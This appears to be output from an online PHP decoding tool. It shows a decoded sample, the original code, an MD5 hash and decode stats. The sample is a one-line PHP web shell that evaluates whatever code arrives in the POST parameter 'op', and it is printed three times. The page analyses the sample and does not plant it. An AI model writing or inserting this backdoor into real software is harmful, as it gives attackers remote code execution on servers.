Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @eval($GLOBALS['_POST']['op']); ?>..
Decoded Output download
<?php
@eval($GLOBALS['_POST']['op']);
?>
Did this file decode correctly?
Original Code
<?php
@eval($GLOBALS['_POST']['op']);
?>
Function Calls
None |
Stats
MD5 | 26be6a6d2735b624788fc56e337ba841 |
Eval Count | 0 |
Decode Time | 92 ms |